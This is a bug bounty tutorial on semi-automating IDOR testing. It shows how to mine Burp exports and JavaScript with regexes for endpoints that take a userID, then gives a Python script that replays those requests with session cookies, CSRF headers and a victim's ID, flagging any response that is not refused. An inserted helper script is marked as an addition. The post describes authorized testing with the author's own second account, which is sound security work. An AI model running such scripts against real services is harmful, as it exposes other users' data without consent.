Semi-Automating IDORs: A Practical Approach to Working Smarter, Not Harder
Assalamu alaikum wa rahmatullahi wa barakatuh Folks,
Today I'll talk about how I sometimes semi-automate IDOR testing to save time and earn more money.
Let's get to the action part.
First, you can't do this process without having an idea of how your target creates the IDs for users, videos, blogs, everything, and how it processes these IDs: is it sending them in a cookie value? A POST parameter? A GET parameter? A JWT in the Authorization header? ASCII hex? Maybe an encrypted user ID? A GUID v1 or v4?
Second, identify the endpoints that accept the ID we identified. For example, let's assume there's a parameter called userID we're trying to hack :p. We need all endpoints that have used it from our Burp project, and we'll use regexes :D. So if our target sends the parameter in a JSON object in a POST request, we could use this regex, for example:
HTTP/2\r\n.*"userID":
This regex will look for all POST requests with the parameter userID in them.
And of course you might want to look for endpoints in the JavaScript, by identifying how the developer refers to the userID in their code; they may be using user_id. How would you know? Search for an endpoint you know for sure is using the userID parameter in the JavaScript file and look at the code responsible for setting the request data, then search for the parameter name the developer uses in all JavaScript files and collect the endpoints that use it. If the userID parameter is a URL-encoded parameter in a GET request, you should look for it in the Wayback Machine too, and with Google dorks (consider that homework).
Now it's time to use our most valuable tool: OUR BRAIN.
Third, we have to collect all the required parameters used in our requests, to prevent errors and false positives.
From our Burp search results press ctrl/command + A -> right click -> uncheck "save as base64 encoded" -> save.
Make a regex to grab the required parameters too (consider that homework): if it's in a JSON request body, make a regex that matches "string":anything up to a comma or }. If you deal with regexes regularly this will be fun for you; if not, just practice more, or get some help from GPT, I use it a lot.
You should end up with something like this, for example:
"param1":"value"
"param2":"value"
"param3":"value"
"param1":"value"
You will definitely want to remove duplicates; I do this in Sublime Text.
Now it's a pure scripting phase using Python; you can use your favorite scripting language.
After collecting all requests/endpoints that use our parameter userID, we should have a list like:
/endpoint/users
/endpoint/users/bookings
/endpoint/users/reminders
/endpoint/users/passwords
So we need to turn them into a Python list. Open your favorite code editor (I'll be using Sublime Text) and do a regex replace of ^ with " and of $ with ", as shown here. Now you only have to add the brackets to make it a list: [ before the first endpoint and ] after the last endpoint.
So it should look like:
[
"/endpoint/users",
"/endpoint/users/bookings",
"/endpoint/users/reminders",
"/endpoint/users/passwords"
]
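The endpoint and parameter collection from the Second and Third steps, plus the list rendering above, as an added Python example that is not part of the original post. It assumes the raw requests have already been pulled out of the Burp export into one text blob (the sample below is constructed) and extracts, for a chosen parameter name, every path that carries it as a JSON body key or query-string key, together with the other keys sent beside it, deduplicated.

```python
import re
from urllib.parse import parse_qsl
# One raw request per block; the lookahead stops each block at the next request line.
REQUEST_RE = re.compile(
    r"^(?P<method>GET|POST|PUT|PATCH|DELETE) (?P<target>\S+) HTTP/[\d.]+\r?\n"
    r"(?P<rest>.*?)(?=^(?:GET|POST|PUT|PATCH|DELETE) \S+ HTTP/|\Z)",
    re.DOTALL | re.MULTILINE,
)
# The post's "string":anything-till-comma-or-} regex, reduced to just the key names.
JSON_KEY_RE = re.compile(r'"([^"\\]+)"\s*:')

def extract_usages(export: str, param: str):
    """Return (endpoints, params): paths sending `param` plus every key seen beside it."""
    endpoints, params = [], []
    for m in REQUEST_RE.finditer(export):
        path, _, query = m.group("target").partition("?")
        parts = re.split(r"\r?\n\r?\n", m.group("rest"), maxsplit=1)  # headers / body
        body = parts[1] if len(parts) > 1 else ""
        keys = [k for k, _ in parse_qsl(query, keep_blank_values=True)]
        keys += JSON_KEY_RE.findall(body)
        if param not in keys:
            continue  # this request does not carry the ID we care about
        if path not in endpoints:
            endpoints.append(path)
        for k in keys:
            if k not in params:
                params.append(k)
    return endpoints, params

def as_python_list(endpoints):
    """Render the list literal the post builds by hand with Sublime's regex replace."""
    return "[\n" + ",\n".join(f'"{e}"' for e in endpoints) + "\n]"

# Constructed sample standing in for raw requests pulled out of a Burp export.
SAMPLE_EXPORT = (
    "POST /endpoint/users/bookings HTTP/2\r\nHost: target.example\r\n"
    'Content-Type: application/json\r\n\r\n{"userID":"1698912852405","param1":"value1","param2":123}\r\n\r\n'
    "GET /endpoint/users/search?userID=1698912852405&q=x HTTP/2\r\nHost: target.example\r\n\r\n"
    "POST /endpoint/users/reminders HTTP/2\r\nHost: target.example\r\n"
    'Content-Type: application/json\r\n\r\n{"param3":"value3","userID":"1698912852405"}\r\n\r\n'
    "POST /endpoint/users/bookings HTTP/2\r\nHost: target.example\r\n"  # duplicate endpoint
    'Content-Type: application/json\r\n\r\n{"userID":"1698912852405"}\r\n\r\n'
    "POST /endpoint/other HTTP/2\r\nHost: target.example\r\n"  # never sends userID
    'Content-Type: application/json\r\n\r\n{"foo":"bar"}\r\n'
)

if __name__ == "__main__":
    eps, params = extract_usages(SAMPLE_EXPORT, "userID")
    print(as_python_list(eps))
    print("required params:", params)
```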
Now we need the cookies and headers to use them in our script. I use the Burp extension "Copy as Python-Requests":
import requests
burp0_url = "<url>"
burp0_cookies = {"_csrfSecret": "7SzZ2udqHWCNBTlsQKoFyNsU"}  # plus the other cookies the extension copied
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/json", "X-Csrf-Token": "AAhWIM7F3eoSJIhgCTV4xthJk1ar12ovTBeArj4F", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers"}
burp0_json = {"userID": "1698912852405"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
Please note that you can use this method to:
1. select all requests and copy them all, then match the parameters in the copied text instead of saving the requests to a file;
2. select all URLs from the copied text instead of from Burp, but you will need to remove the burp<number>_ prefix from the variable names so you can match them all using url = .*, and you'll have to add a comma at the end of the lines to have a list. You get what I mean, right? Regexes are your friend in automation :D
For our flow, we only need the cookies and headers, because we matched the endpoints before. Now we just need a little if condition to recognize a successful result.
After understanding how your target responds to all types of requests, you should be able to tell apart unauthorized requests, unauthenticated requests, and error responses. Every web application responds differently depending on its configuration; I mean you may get a 200 OK status code but the response body tells you you're unauthorized to do this action. So make the if statement suit your target; for example I may write it like:
if 'unauthorized' not in r.text:
    print(f"{URL} passed!")
Now it's time to combine things together :D
- import the requests lib
- add the list of URLs we've collected in a variable urls
- loop over the URLs list so every iteration sends a request to a URL with data, headers, and cookies. DON'T FORGET TO REPLACE THE userID parameter with the victim's one (your second account for testing)
- the if statement inside the loop checks whether the request succeeded
import requests

base_url = "https://<target>"  # the target's origin; the paths in urls are relative to it
victimUserID = "<userID of your second test account>"
urls = [
    "/endpoint/users",
    "/endpoint/users/bookings",
    "/endpoint/users/reminders",
    "/endpoint/users/passwords"
]
cookies = {
    "_csrfSecret": "7SzZ2udqHWCNBTlsQKoFyNsU",
    # other cookies copied from Burp
}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/json",
    "X-Csrf-Token": "AAhWIM7F3eoSJIhgCTV4xthJk1ar12ovTBeArj4F",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Te": "trailers"
}
datajson = {
    "userID": victimUserID,
    "param1": "value1",
    "param2": "value2",
    "param3": "value3"
}
for url in urls:
    # sending the POST request with the collected headers, cookies and body
    response = requests.post(base_url + url, headers=headers, cookies=cookies, json=datajson)
    # handling the response: adapt this check to how your target signals "unauthorized"
    if 'unauthorized' not in response.text:
        print(f"{url} VULNERABLE TO IDOR, can you confirm it?")
Some notes
- you will need to improvise sometimes to collect the parameters and play around with regexes to match what you want
- you should have been using a Burp project from day 0 of hacking your target, because it stores every request you sent, so it will have a lot of endpoints to grab the parameters from
Feel free to ask/contact me if you want ;)
My Twitter account: https://x.com/mux0x